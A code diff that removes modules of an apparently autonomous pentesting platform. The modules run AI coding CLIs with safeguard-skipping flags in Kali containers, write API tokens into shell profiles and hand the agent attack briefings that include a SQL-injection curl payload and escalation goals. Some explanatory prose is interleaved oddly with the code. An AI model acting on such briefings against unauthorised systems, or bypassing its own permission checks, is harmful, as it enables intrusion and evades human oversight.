"scan_id": data.get("_scan_id", f.stem),
"target": data.get("target", "unknown"),
"progress": data.get("progress", 0),
"phase": data.get("phase", "unknown"),
"timestamp": data.get("_timestamp", 0),
"findings_count": len(data.get("findings", [])),
})
except Exception:
continue
# Sort by most recent first
checkpoints.sort(key=lambda c: c["timestamp"], reverse=True)
return checkpoints
@staticmethod
def cleanup_old(max_age_hours: int = 72):
"""Remove checkpoints older than max_age_hours."""
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
cutoff = time.time() - (max_age_hours * 3600)
removed = 0
for f in CHECKPOINT_DIR.glob("*.json"):
try:
if f.stat().st_mtime < cutoff:
f.unlink()
removed += 1
except Exception:
continue
if removed:
logger.info(f"Cleaned up {removed} old checkpoints")
@@ -1,721 +0,0 @@
"""
CLI Agent Runner - Executes AI CLI tools (Claude Code, Gemini CLI, Codex CLI) inside
Kali Linux Docker containers for autonomous penetration testing.
Architecture:
1. Detects OAuth token from SmartRouter
2. Creates per-scan Kali container via ContainerPool
3. Installs Node.js + selected CLI tool
4. Uploads methodology file + instructions
5. Runs CLI in non-interactive mode (background process)
6. Polls output file, extracts findings in real-time
7. Findings flow through existing validation pipeline
Follows ResearcherAgent pattern (lifecycle, callbacks, sandbox integration).
"""
import os
import time
import asyncio
import logging
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple, Callable, Any
logger = logging.getLogger(__name__)
# ═══════════════════════════════════════════════════════════════════════════════
# CLI Provider Definitions
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class CLIProvider:
"""Definition of a CLI tool that can run inside the Kali container."""
id: str
name: str
npm_package: str
command: str
auth_env: str # Env var for the OAuth/API token
non_interactive_flags: str # Flags for non-interactive mode
model_flag: str # Flag to specify model
needs_nodejs: bool = True # Most CLI tools are npm-based
install_cmd: Optional[str] = None # Override for non-npm install
prompt_method: str = "stdin" # "stdin", "flag", "file"
extra_setup: Optional[str] = None # Extra setup commands after install
CLI_PROVIDERS: Dict[str, CLIProvider] = {
"claude_code": CLIProvider(
id="claude_code",
name="Claude Code",
npm_package="@anthropic-ai/claude-code",
command="claude",
auth_env="ANTHROPIC_API_KEY",
non_interactive_flags="--print --dangerously-skip-permissions --verbose",
model_flag="--model",
prompt_method="stdin",
),
"gemini_cli": CLIProvider(
id="gemini_cli",
name="Gemini CLI",
npm_package="@google/gemini-cli",
command="gemini",
auth_env="GEMINI_API_KEY",
non_interactive_flags="--sandbox",
model_flag="--model",
prompt_method="stdin",
),
"codex_cli": CLIProvider(
id="codex_cli",
name="OpenAI Codex CLI",
npm_package="@openai/codex",
command="codex",
auth_env="OPENAI_API_KEY",
non_interactive_flags="--full-auto --quiet",
model_flag="--model",
prompt_method="stdin",
),
}
# ═══════════════════════════════════════════════════════════════════════════════
# Result Data Classes
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class CLIAgentResult:
"""Result of a CLI agent run."""
findings: List[Dict] = field(default_factory=list)
raw_output: str = ""
duration: float = 0.0
exit_code: int = -1
tools_used: List[str] = field(default_factory=list)
phases_completed: List[str] = field(default_factory=list)
total_output_lines: int = 0
cli_provider: str = ""
error: Optional[str] = None
# ═══════════════════════════════════════════════════════════════════════════════
# CLI Agent Runner
# ═══════════════════════════════════════════════════════════════════════════════
class CLIAgentRunner:
"""
Runs an AI CLI tool inside a Kali Linux container for penetration testing.
Lifecycle:
runner = CLIAgentRunner(...)
ok, msg = await runner.initialize() # Container + CLI install
result = await runner.run() # Execute + poll findings
await runner.shutdown() # Cleanup
"""
WORK_DIR = "/opt/pentest"
OUTPUT_LOG = "/opt/pentest/output.log"
FINDINGS_LOG = "/opt/pentest/findings.jsonl"
def __init__(
self,
scan_id: str,
target: str,
cli_provider_id: str = "claude_code",
methodology_path: Optional[str] = None,
preferred_model: Optional[str] = None,
log_callback: Optional[Callable] = None,
progress_callback: Optional[Callable] = None,
finding_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_runtime: Optional[int] = None,
token_budget: Optional[Any] = None,
llm: Optional[Any] = None,
):
self.scan_id = scan_id
self.target = target
self.cli_provider_id = cli_provider_id
self.methodology_path = methodology_path or os.getenv(
"METHODOLOGY_FILE", "/opt/Prompts-PenTest/pentestcompleto_en.md"
)
self.preferred_model = preferred_model
self.log_callback = log_callback
self.progress_callback = progress_callback
self.finding_callback = finding_callback
self.auth_headers = auth_headers or {}
self.token_budget = token_budget
self.llm = llm
# Runtime config
self.max_runtime = max_runtime or int(os.getenv("CLI_AGENT_MAX_RUNTIME", "1800"))
self.poll_interval = 3 # seconds between output checks
self.stale_timeout = 300 # kill if no new output for 5 min
self.ai_extract_interval = 300 # AI extraction every 5 min
# State
self._sandbox = None
self._provider: Optional[CLIProvider] = None
self._oauth_token: Optional[str] = None
self._cli_pid: Optional[str] = None
self._cancelled = False
self._output_offset = 0
self._last_output_time = 0.0
self._start_time = 0.0
self._all_output: List[str] = []
# Parser
from backend.core.cli_output_parser import CLIOutputParser
self._parser = CLIOutputParser()
# Recon data (set by autonomous_agent before run, for auto_pentest integration)
self.recon_data: Optional[Dict] = None
self.existing_findings: Optional[List] = None
# ── Logging Helpers ────────────────────────────────────────────────────
async def _log(self, level: str, message: str):
if self.log_callback:
try:
await self.log_callback(level, f"[CLI-AGENT] {message}")
except Exception:
pass
logger.log(
getattr(logging, level.upper(), logging.INFO),
f"[CLI-AGENT] {message}"
)
async def _progress(self, pct: int, phase: str):
if self.progress_callback:
try:
await self.progress_callback(pct, phase)
except Exception:
pass
# ── Lifecycle ──────────────────────────────────────────────────────────
async def initialize(self) -> Tuple[bool, str]:
"""Initialize: create container, install CLI, upload files."""
try:
# 1. Resolve provider
self._provider = CLI_PROVIDERS.get(self.cli_provider_id)
if not self._provider:
return False, f"Unknown CLI provider: {self.cli_provider_id}"
await self._log("info", f"Provider: {self._provider.name}")
# 2. Get OAuth token from SmartRouter
self._oauth_token = self._get_oauth_token(self.cli_provider_id)
if not self._oauth_token:
# Try API key from env
env_key = self._provider.auth_env
self._oauth_token = os.getenv(env_key, "")
if not self._oauth_token:
return False, (
f"No OAuth token or API key found for {self._provider.name}. "
f"Connect via Providers page or set {env_key} in .env"
)
await self._log("info", "Using API key from environment")
else:
await self._log("info", "Using OAuth token from SmartRouter")
# 3. Create Kali sandbox container
await self._log("info", "Creating Kali sandbox container...")
try:
from core.container_pool import get_pool
pool = get_pool()
self._sandbox = await pool.get_or_create(
scan_id=f"cli-agent-{self.scan_id}",
enable_vpn=False,
)
await self._log("info", f"Container ready: {getattr(self._sandbox, 'container_name', 'kali')}")
except Exception as e:
return False, f"Failed to create Kali container: {e}"
# 4. Install Node.js + CLI tool
await self._log("info", "Installing Node.js...")
await self._progress(2, "Installing Node.js")
result = await self._sandbox.execute_raw(
"which node > /dev/null 2>&1 && echo 'exists' || "
"(apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq nodejs npm > /dev/null 2>&1 && echo 'installed')",
timeout=120,
)
if "exists" in result.stdout:
await self._log("info", "Node.js already available")
elif "installed" in result.stdout:
await self._log("info", "Node.js installed successfully")
else:
return False, f"Failed to install Node.js: {result.stderr[:200]}"
await self._log("info", f"Installing {self._provider.name} CLI...")
await self._progress(4, f"Installing {self._provider.name}")
install_cmd = self._provider.install_cmd or f"npm install -g {self._provider.npm_package}"
result = await self._sandbox.execute_raw(install_cmd, timeout=180)
# Verify CLI is available
verify = await self._sandbox.execute_raw(f"which {self._provider.command}", timeout=10)
if verify.exit_code != 0:
# Try npx fallback
verify2 = await self._sandbox.execute_raw(
f"npx --yes {self._provider.npm_package} --version", timeout=60
)
if verify2.exit_code != 0:
return False, f"CLI tool '{self._provider.command}' not found after installation"
await self._log("info", "CLI available via npx")
else:
await self._log("info", f"CLI installed: {verify.stdout.strip()}")
# 5. Extra setup if needed
if self._provider.extra_setup:
await self._sandbox.execute_raw(self._provider.extra_setup, timeout=60)
# 6. Upload files
await self._log("info", "Uploading methodology and instructions...")
await self._progress(6, "Uploading files")
await self._upload_files()
# 7. Inject OAuth token as env var
await self._inject_token()
await self._log("info", "Initialization complete")
await self._progress(8, "Ready to start")
return True, "CLI Agent initialized successfully"
except Exception as e:
logger.exception("[CLI-AGENT] Initialization failed")
return False, f"Initialization error: {e}"
async def run(self) -> CLIAgentResult:
"""Execute the CLI agent and poll for findings."""
if not self._sandbox or not self._provider:
return CLIAgentResult(error="Not initialized")
self._start_time = time.time()
self._last_output_time = self._start_time
try:
# Start CLI process
await self._log("info", f"Starting {self._provider.name} against {self.target}")
await self._progress(10, f"{self._provider.name} starting")
pid = await self._start_cli_process()
if not pid:
return CLIAgentResult(error="Failed to start CLI process")
self._cli_pid = pid
await self._log("info", f"CLI process started (PID: {pid})")
# Poll output loop
result = await self._poll_output_loop()
return result
except asyncio.CancelledError:
await self._log("warning", "Run cancelled")
await self._kill_cli_process()
return CLIAgentResult(error="Cancelled")
except Exception as e:
logger.exception("[CLI-AGENT] Run failed")
await self._log("error", f"Run error: {e}")
return CLIAgentResult(error=str(e))
async def shutdown(self):
"""Cleanup: kill CLI process and destroy container."""
await self._kill_cli_process()
if self._sandbox:
try:
from core.container_pool import get_pool
await get_pool().destroy(f"cli-agent-{self.scan_id}")
await self._log("info", "Container destroyed")
except Exception as e:
logger.warning(f"[CLI-AGENT] Cleanup error: {e}")
self._sandbox = None
def cancel(self):
"""Signal cancellation."""
self._cancelled = True
# ── Container Setup (Private) ──────────────────────────────────────────
def _get_oauth_token(self, provider_id: str) -> Optional[str]:
"""Retrieve OAuth token from SmartRouter ProviderRegistry."""
try:
from backend.core.smart_router import get_registry
registry = get_registry()
if not registry:
return None
accounts = registry.get_active_accounts(provider_id)
if not accounts:
return None
# Use first active account
account = accounts[0]
credential = registry.get_credential(account.id)
if credential:
logger.info(f"[CLI-AGENT] Got OAuth token for {provider_id} (account: {account.label})")
return credential
return None
except Exception as e:
logger.debug(f"[CLI-AGENT] SmartRouter token retrieval failed: {e}")
return None
async def _upload_files(self):
"""Upload methodology file, instructions, and CLAUDE.md to container."""
from backend.core.cli_instructions_builder import (
build_instructions, build_claude_md, load_methodology
)
# Create work directory
await self._sandbox.execute_raw(f"mkdir -p {self.WORK_DIR}", timeout=5)
# Load and upload methodology
methodology = load_methodology(self.methodology_path)
if methodology:
await self._sandbox.upload_file(
methodology.encode("utf-8"),
f"{self.WORK_DIR}/methodology.md",
)
await self._log("info", f"Uploaded methodology ({len(methodology)} chars)")
else:
await self._log("warning", "No methodology file available")
# Build and upload instructions
extra_context = None
if self.recon_data:
# Include recon context if available (auto_pentest integration)
endpoints = self.recon_data.get("endpoints", [])[:20]
techs = self.recon_data.get("technologies", [])
extra_parts = []
if techs:
extra_parts.append(f"Detected technologies: {', '.join(techs)}")
if endpoints:
ep_list = "\n".join(
f"- {e.get('method', 'GET')} {e.get('url', '')}" for e in endpoints[:15]
)
extra_parts.append(f"Discovered endpoints:\n{ep_list}")
if self.existing_findings:
extra_parts.append(
f"Already found {len(self.existing_findings)} vulnerabilities. "
f"Focus on areas not yet tested."
)
extra_context = "\n".join(extra_parts)
instructions = build_instructions(
target=self.target,
auth_headers=self.auth_headers if self.auth_headers else None,
methodology_path=f"{self.WORK_DIR}/methodology.md",
extra_context=extra_context,
)
await self._sandbox.upload_file(
instructions.encode("utf-8"),
f"{self.WORK_DIR}/instructions.md",
)
# Build and upload CLAUDE.md (auto-read by Claude Code)
claude_md = build_claude_md(
target=self.target,
auth_headers=self.auth_headers if self.auth_headers else None,
)
await self._sandbox.upload_file(
claude_md.encode("utf-8"),
f"{self.WORK_DIR}/CLAUDE.md",
)
async def _inject_token(self):
"""Inject OAuth/API token as environment variable in container."""
if not self._oauth_token or not self._provider:
return
# Write to .bashrc so it's available to background processes
env_var = self._provider.auth_env
# Use base64 encoding to safely pass token with special chars
import base64
encoded = base64.b64encode(self._oauth_token.encode()).decode()
await self._sandbox.execute_raw(
f'echo \'export {env_var}="$(echo {encoded} | base64 -d)"\' >> /root/.bashrc',
timeout=5,
)
# Also write to a env file that can be sourced
await self._sandbox.execute_raw(
f'echo \'export {env_var}="$(echo {encoded} | base64 -d)"\' > {self.WORK_DIR}/.env',
timeout=5,
)
await self._log("info", f"Token injected as ${env_var}")
# ── Execution (Private) ────────────────────────────────────────────────
async def _start_cli_process(self) -> Optional[str]:
"""Start the CLI tool as a background process in the container."""
provider = self._provider
if not provider:
return None
# Build model flag
model_part = ""
if self.preferred_model and provider.model_flag:
model_part = f"{provider.model_flag} {self.preferred_model}"
# Build the CLI command. Every provider currently receives the prompt as a
# positional argument read from the instructions file, so a single template
# covers claude_code, codex_cli, and the generic fallback.
cli_cmd = (
f"cd {self.WORK_DIR} && "
f"source {self.WORK_DIR}/.env && "
f"{provider.command} {provider.non_interactive_flags} "
f"{model_part} "
f"\"$(cat {self.WORK_DIR}/instructions.md)\""
)
# Run as background process with output capture
full_cmd = (
f"nohup bash -c '{cli_cmd}' "
f"> {self.OUTPUT_LOG} 2>&1 & echo $!"
)
result = await self._sandbox.execute_raw(full_cmd, timeout=15)
pid = result.stdout.strip().split('\n')[-1].strip()
if pid and pid.isdigit():
return pid
await self._log("error", f"Failed to get PID. stdout: {result.stdout[:200]}, stderr: {result.stderr[:200]}")
return None
async def _poll_output_loop(self) -> CLIAgentResult:
"""Main polling loop: read output, parse findings, check process status."""
last_ai_extract = time.time()
all_findings: List[Dict] = []
raw_output_parts: List[str] = []
while not self._cancelled:
elapsed = time.time() - self._start_time
# Check max runtime
if elapsed > self.max_runtime:
await self._log("warning", f"Max runtime ({self.max_runtime}s) exceeded, stopping")
await self._kill_cli_process()
break
# Read new output
new_text = await self._read_new_output()
if new_text:
self._last_output_time = time.time()
raw_output_parts.append(new_text)
# Log interesting lines (not every line to avoid spam)
for line_no, line in enumerate(new_text.split('\n')):
line_s = line.strip()
if not line_s:
continue
# Always log phase markers and findings
if any(kw in line_s for kw in [
'[PHASE]', '[COMPLETE]', '[FINDING]', '[VULNERABILITY]',
'FINDING_START', 'FINDING_END', '[critical]', '[high]',
'Confirmed', 'Vulnerability found',
]):
await self._log("info", line_s[:300])
elif line_no % 20 == 0:
# Log every 20th line of the chunk as debug
await self._log("debug", line_s[:200])
# Parse findings from new output
parsed = self._parser.parse_chunk(new_text)
for finding in parsed:
finding_dict = finding.to_dict()
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
# Emit finding through callback
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception as e:
logger.debug(f"Finding callback error: {e}")
await self._log("success",
f"Finding: {finding.title} [{finding.severity.upper()}]")
# Check stale timeout (no output for too long)
stale_elapsed = time.time() - self._last_output_time
if stale_elapsed > self.stale_timeout:
await self._log("warning", f"No output for {int(stale_elapsed)}s, stopping")
await self._kill_cli_process()
break
# AI extraction on accumulated unparsed text (every 5 min)
if (time.time() - last_ai_extract > self.ai_extract_interval
and self.llm and self._parser.get_unparsed_text(clear=False)):
last_ai_extract = time.time()
await self._run_ai_extraction(all_findings)
# Check if CLI process is still running
if not await self._is_process_alive():
await self._log("info", "CLI process has exited")
# Read any remaining output
remaining = await self._read_new_output()
if remaining:
raw_output_parts.append(remaining)
parsed = self._parser.parse_chunk(remaining)
for finding in parsed:
finding_dict = finding.to_dict()
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception:
pass
break
# Update progress (time-based heuristic)
pct = min(90, 10 + int((elapsed / self.max_runtime) * 80))
phase = f"{self._provider.name} testing ({int(elapsed)}s)"
if self._parser.phases:
phase = f"{self._parser.phases[-1]} ({int(elapsed)}s)"
await self._progress(pct, phase)
await asyncio.sleep(self.poll_interval)
# Final AI extraction on any remaining unparsed text
if self.llm:
await self._run_ai_extraction(all_findings)
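# Get exit code. Note: `wait` only reports on children of the calling shell,
# so if execute_raw starts a fresh shell this yields the shell's error code
# rather than the CLI's real exit status.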
exit_code = -1
try:
if self._cli_pid:
result = await self._sandbox.execute_raw(
f"wait {self._cli_pid} 2>/dev/null; echo $?", timeout=5
)
code = result.stdout.strip().split('\n')[-1].strip()
if code.isdigit():
exit_code = int(code)
except Exception:
pass
duration = time.time() - self._start_time
raw_output = "\n".join(raw_output_parts)
await self._log("info",
f"Completed: {len(all_findings)} findings, "
f"{self._parser.total_findings} total parsed, "
f"{int(duration)}s elapsed")
await self._progress(95, "CLI Agent complete")
return CLIAgentResult(
findings=all_findings,
raw_output=raw_output[:500000], # Cap raw output at 500KB
duration=duration,
exit_code=exit_code,
phases_completed=self._parser.phases,
total_output_lines=len(self._all_output),
cli_provider=self.cli_provider_id,
)
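The time-based progress heuristic used in the polling loop is easy to check by hand. A small sketch, assuming a hypothetical one-hour `max_runtime`; `progress_pct` is an illustrative helper, not a function from the project:

```python
def progress_pct(elapsed: float, max_runtime: float) -> int:
    """Map elapsed time onto the 10..90 range, as in the polling loop."""
    return min(90, 10 + int((elapsed / max_runtime) * 80))


# Assumed max_runtime of 3600 seconds, purely for illustration.
samples = [progress_pct(t, 3600) for t in (0, 900, 1800, 3600, 7200)]
print(samples)
```

Progress starts at 10, rises linearly, and is capped at 90, which leaves headroom for the final extraction step and the 95% "CLI Agent complete" update.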
async def _read_new_output(self) -> str:
"""Read new output from the CLI's log file since last check."""
try:
# Use dd to read from offset (more reliable than tail -c +N)
result = await self._sandbox.execute_raw(
f"dd if={self.OUTPUT_LOG} bs=1 skip={self._output_offset} 2>/dev/null",
timeout=10,
)
if result.stdout:
self._output_offset += len(result.stdout.encode('utf-8'))
self._all_output.extend(result.stdout.split('\n'))
return result.stdout
except Exception as e:
logger.debug(f"[CLI-AGENT] Read output error: {e}")
return ""
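The offset-tracking idea behind `_read_new_output` can be sketched locally with plain file I/O. This is an assumption-laden stand-in: `LogTail` is a hypothetical class that reads a local file instead of running `dd` in the sandbox, and it advances the offset by the raw byte count rather than by re-encoding decoded text.

```python
import os
import tempfile


class LogTail:
    """Hypothetical local stand-in for the dd-based incremental reader."""

    def __init__(self, path: str) -> None:
        self.path = path
        self.offset = 0  # number of bytes already consumed

    def read_new(self) -> str:
        # Seek to the last consumed byte and read whatever was appended.
        with open(self.path, "rb") as fh:
            fh.seek(self.offset)
            data = fh.read()
        self.offset += len(data)
        return data.decode("utf-8", errors="replace")


with tempfile.NamedTemporaryFile("wb", delete=False) as tmp:
    tmp.write(b"[PHASE] recon\n")
    log_path = tmp.name

tail = LogTail(log_path)
first = tail.read_new()            # everything written so far
with open(log_path, "ab") as fh:   # simulate the CLI appending output
    fh.write("finding \u2713\n".encode("utf-8"))
second = tail.read_new()           # only the appended part
third = tail.read_new()            # nothing new
os.remove(log_path)
```

Counting raw bytes keeps the offset exact even when the output contains multi-byte characters; whether the sandbox's `stdout` round-trips byte-for-byte is not something the source states.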
async def _is_process_alive(self) -> bool:
"""Check if the CLI process is still running."""
if not self._cli_pid:
return False
try:
result = await self._sandbox.execute_raw(
f"kill -0 {self._cli_pid} 2>/dev/null && echo alive || echo dead",
timeout=5,
)
return "alive" in result.stdout
except Exception:
return False
async def _kill_cli_process(self):
"""Kill the CLI process in the container."""
if not self._cli_pid or not self._sandbox:
return
try:
await self._sandbox.execute_raw(
f"kill {self._cli_pid} 2>/dev/null; sleep 1; kill -9 {self._cli_pid} 2>/dev/null",
timeout=10,
)
await self._log("info", f"CLI process {self._cli_pid} killed")
except Exception as e:
logger.debug(f"[CLI-AGENT] Kill error: {e}")
async def _run_ai_extraction(self, all_findings: List[Dict]):
"""Run AI-assisted finding extraction on unparsed text."""
unparsed = self._parser.get_unparsed_text(clear=True)
if not unparsed or len(unparsed) < 200:
return
try:
from backend.core.cli_output_parser import ai_extract_findings
ai_findings = await ai_extract_findings(unparsed, self.llm)
for finding in ai_findings:
finding_dict = finding.to_dict()
# Check for duplicates
h = f"{finding.title}|{finding.endpoint}|{finding.severity}"
existing_hashes = {
f"{f.get('title', '')}|{f.get('affected_endpoint', '')}|{f.get('severity', '')}"
for f in all_findings
}
if h not in existing_hashes:
finding_dict["affected_endpoint"] = finding_dict.get("affected_endpoint") or self.target
all_findings.append(finding_dict)
if self.finding_callback:
try:
await self.finding_callback(finding_dict)
except Exception:
pass
await self._log("success",
f"AI-extracted: {finding.title} [{finding.severity.upper()}]")
except Exception as e:
logger.debug(f"[CLI-AGENT] AI extraction error: {e}")
# ── Status ──────────────────────────────────────────────────────────────
def get_status(self) -> Dict:
"""Return current runner status."""
elapsed = time.time() - self._start_time if self._start_time else 0
return {
"provider": self.cli_provider_id,
"provider_name": self._provider.name if self._provider else "",
"target": self.target,
"running": self._cli_pid is not None and not self._cancelled,
"elapsed": int(elapsed),
"findings_count": self._parser.total_findings,
"phases": self._parser.phases,
"output_lines": len(self._all_output),
"is_complete": self._parser.is_complete,
}
@@ -1,224 +0,0 @@
"""
CLI Instructions Builder - Generates prompt files for CLI agents inside Kali containers.
Creates:
1. instructions.md - Master prompt with target, output format, rules
2. CLAUDE.md - Auto-loaded project context for Claude Code CLI
3. GEMINI.md-style context for other CLI tools (currently the same content as CLAUDE.md)
"""
import os
import json
import logging
from typing import Dict, Optional, List
logger = logging.getLogger(__name__)
# Pre-installed tools in the Kali container
KALI_TOOLS_PREINSTALLED = [
"nmap", "nuclei", "httpx", "sqlmap", "nikto", "ffuf", "gobuster",
"subfinder", "katana", "dnsx", "dalfox", "waybackurls", "uncover",
"masscan", "whatweb", "curl", "wget", "python3", "git", "jq",
"dig", "whois", "netcat",
]
KALI_TOOLS_INSTALLABLE = [
"wpscan", "dirb", "hydra", "john", "hashcat", "testssl.sh", "sslscan",
"enum4linux", "dnsrecon", "fierce", "amass", "medusa",
"dirsearch", "wfuzz", "arjun", "wafw00f", "sslyze", "commix",
"gau", "gitleaks", "httprobe",
]
def build_instructions(
target: str,
auth_headers: Optional[Dict] = None,
methodology_path: str = "/opt/pentest/methodology.md",
extra_context: Optional[str] = None,
) -> str:
"""Build the master instructions file for the CLI agent."""
auth_section = ""
if auth_headers:
auth_section = f"""## Authentication
Use these headers in ALL requests:
```
{json.dumps(auth_headers, indent=2)}
```
"""
else:
auth_section = """## Authentication
No authentication provided. Test unauthenticated access only.
If you discover login forms, note them but do NOT attempt brute-force without auth credentials.
"""
extra_section = ""
if extra_context:
extra_section = f"""## Additional Context
{extra_context}
"""
return f"""# AUTOMATED PENETRATION TEST - MISSION BRIEFING
## Target
{target}
{auth_section}
## Your Mission
You are an expert penetration tester conducting a comprehensive security assessment against the target above.
You have full access to a Kali Linux environment with all tools pre-installed.
## Methodology
Read and follow the comprehensive methodology file at: {methodology_path}
Execute each phase systematically. Do not skip phases.
{extra_section}
## Available Tools
**Pre-installed** (use directly):
{', '.join(KALI_TOOLS_PREINSTALLED)}
**Installable on-demand** (use `apt-get install -y <tool>` or `pip3 install <tool>`):
{', '.join(KALI_TOOLS_INSTALLABLE)}
You can also install any other tool available in Kali repositories.
## CRITICAL: Output Format for Findings
When you discover and CONFIRM a vulnerability, output it in EXACTLY this format:
===FINDING_START===
{{
"title": "SQL Injection in login endpoint",
"severity": "critical",
"vulnerability_type": "sqli_error",
"endpoint": "{target}/api/login",
"parameter": "username",
"evidence": "The response contained: You have an error in your SQL syntax...",
"poc_code": "curl -X POST '{target}/api/login' -d 'username=admin\\'--&password=x'",
"request": "POST /api/login HTTP/1.1\\nHost: ...\\nContent-Type: application/x-www-form-urlencoded\\n\\nusername=admin'--&password=x",
"response": "HTTP/1.1 500 Internal Server Error\\n...\\n{{\\"error\\": \\"SQL syntax error near...\\"}}",
"impact": "An attacker can extract all database contents including user credentials",
"cvss_score": 9.8
}}
===FINDING_END===
## Phase Progress Tracking
Mark each phase with:
```
echo "[PHASE] Starting Phase N: Description"
```
When ALL testing is complete:
```
echo "[COMPLETE] Penetration test finished"
```
## Rules
1. **VERIFY before reporting**: Only output findings with REAL evidence (actual HTTP responses, error messages, data leakage). Do NOT report theoretical vulnerabilities.
2. **Be thorough**: Test ALL phases in the methodology. Test every endpoint, parameter, and header you discover.
3. **Output immediately**: Report each finding as soon as you confirm it. Don't wait until the end.
4. **Include real evidence**: Copy actual HTTP requests/responses in the finding. Show the exact command that confirmed the vulnerability.
5. **Use multiple tools**: Cross-validate findings with different tools when possible (e.g., confirm SQLi with both manual testing AND sqlmap).
6. **Follow the methodology**: The methodology file contains detailed testing procedures for 100+ vulnerability types. Follow it step by step.
7. **Escalate findings**: If you find a low-severity issue, check if it can be escalated (e.g., information disclosure -> credential access -> admin takeover).
8. **Document everything**: Even if a test is negative, log what you tested so we know the coverage.
9. **Time management**: Spend more time on high-risk areas (auth, injection, file access) and less on informational checks.
10. **No hallucination**: If a tool produces no output or an error, report what happened honestly. Do NOT fabricate results.
## Vulnerability Types to Test (Priority Order)
**Critical Priority**: SQL Injection, Command Injection, SSRF, XXE, File Upload, Auth Bypass, IDOR
**High Priority**: XSS (Reflected, Stored, DOM), SSTI, Path Traversal, LFI/RFI, CSRF, JWT Manipulation
**Medium Priority**: Open Redirect, CORS Misconfiguration, CRLF Injection, Rate Limiting, Information Disclosure
**Lower Priority**: Security Headers, SSL/TLS Issues, Clickjacking, Directory Listing, HTTP Methods
## Start Now
Begin by reading {methodology_path}, then:
1. Reconnaissance: Probe the target, discover endpoints, detect technologies
2. Map the attack surface: Forms, APIs, parameters, headers, cookies
3. Test systematically: Follow the methodology phase by phase
4. Report findings: Output each confirmed vulnerability in the format above
"""
def build_claude_md(target: str, auth_headers: Optional[Dict] = None) -> str:
"""Build CLAUDE.md file (auto-read by Claude Code CLI as project context)."""
auth_note = ""
if auth_headers:
auth_note = "\nAuthentication headers are provided in instructions.md."
return f"""# Penetration Testing Agent - Project Context
## Mission
Comprehensive penetration test against: {target}
{auth_note}
## Working Directory
- `/opt/pentest/methodology.md` - Full testing methodology (READ THIS FIRST)
- `/opt/pentest/instructions.md` - Target details, output format, rules
- `/opt/pentest/output.log` - Your output is being captured here
## Output Format
For EVERY confirmed vulnerability, output between markers:
===FINDING_START===
{{"title": "...", "severity": "critical|high|medium|low|info", "vulnerability_type": "...", "endpoint": "...", "evidence": "...", "poc_code": "..."}}
===FINDING_END===
## Key Rules
- ONLY report CONFIRMED vulnerabilities with real evidence
- Include actual HTTP requests/responses as proof
- Use Kali Linux tools (nmap, nuclei, sqlmap, ffuf, etc.)
- Follow the methodology systematically
- Mark phases: echo "[PHASE] Starting Phase N: ..."
- When done: echo "[COMPLETE] Penetration test finished"
## Environment
- Kali Linux with full toolset
- Network access to target
- All Kali tools available (install more with apt-get if needed)
"""
def build_gemini_instructions(target: str, auth_headers: Optional[Dict] = None) -> str:
"""Build instructions optimized for Gemini CLI."""
# Gemini CLI uses GEMINI.md or similar - same content, adapted format
return build_claude_md(target, auth_headers)
def load_methodology(methodology_path: str) -> str:
"""Load methodology file content."""
if not methodology_path:
return ""
# Resolve environment variable
if methodology_path.startswith("$"):
var_name = methodology_path.lstrip("$").strip("{}")
methodology_path = os.getenv(var_name, "")
if not methodology_path or not os.path.exists(methodology_path):
# Try common locations
common_paths = [
"/opt/Prompts-PenTest/pentestcompleto_en.md",
"/opt/Prompts-PenTest/pentestcompleto.md",
"/opt/Prompts-PenTest/PROMPT_PENTEST_FINAL_COMPLETO.md",
]
for path in common_paths:
if os.path.exists(path):
methodology_path = path
break
else:
logger.warning("[CLI-BUILDER] No methodology file found")
return ""
try:
with open(methodology_path, "r", encoding="utf-8") as f:
content = f.read()
logger.info(f"[CLI-BUILDER] Loaded methodology: {methodology_path} ({len(content)} chars)")
return content
except Exception as e:
logger.error(f"[CLI-BUILDER] Failed to load methodology: {e}")
return ""
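The environment-variable resolution at the top of `load_methodology` accepts both `$VAR` and `${VAR}` forms. A minimal sketch of just that step, using a hypothetical variable name `EXAMPLE_METHODOLOGY` and a hypothetical helper `resolve_path`:

```python
import os


def resolve_path(raw: str) -> str:
    """Resolve a path given either literally or as $VAR / ${VAR}."""
    if raw.startswith("$"):
        # "$VAR" -> "VAR", "${VAR}" -> "{VAR}" -> "VAR"
        var_name = raw.lstrip("$").strip("{}")
        return os.getenv(var_name, "")
    return raw


# Hypothetical variable and path, set only for this demonstration.
os.environ["EXAMPLE_METHODOLOGY"] = "/tmp/methodology.md"
plain = resolve_path("$EXAMPLE_METHODOLOGY")
braced = resolve_path("${EXAMPLE_METHODOLOGY}")
literal = resolve_path("/opt/pentest/methodology.md")
missing = resolve_path("$EXAMPLE_UNSET_VARIABLE_123")
```

Note that this handles a value that is entirely a variable reference; something like `$VAR/sub/file.md` would be treated as a single (nonexistent) variable name and resolve to an empty string.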
@@ -1,457 +0,0 @@
"""
CLI Output Parser - 3-tier finding extraction from CLI agent output.
Tier 1: JSON marker blocks (===FINDING_START=== / ===FINDING_END===)
Tier 2: Regex patterns for known tool output formats (nuclei, nmap, sqlmap)
Tier 3: AI-assisted extraction via LLM for unstructured text
"""
import json
import re
import logging
from dataclasses import dataclass, field
from typing import List, Dict, Optional, Set
logger = logging.getLogger(__name__)
# JSON finding markers used in CLI instructions
FINDING_START = "===FINDING_START==="
FINDING_END = "===FINDING_END==="
# Progress markers
PHASE_PATTERN = re.compile(r'\[PHASE\]\s*(.+)', re.IGNORECASE)
COMPLETE_PATTERN = re.compile(r'\[COMPLETE\]', re.IGNORECASE)
PROGRESS_PATTERN = re.compile(r'\[PROGRESS\]\s*(\d+)%?\s*(.*)', re.IGNORECASE)
# Severity keywords for regex extraction
SEVERITY_MAP = {
"critical": "critical", "crit": "critical",
"high": "high",
"medium": "medium", "med": "medium",
"low": "low",
"info": "info", "informational": "info",
}
# Nuclei JSONL output pattern
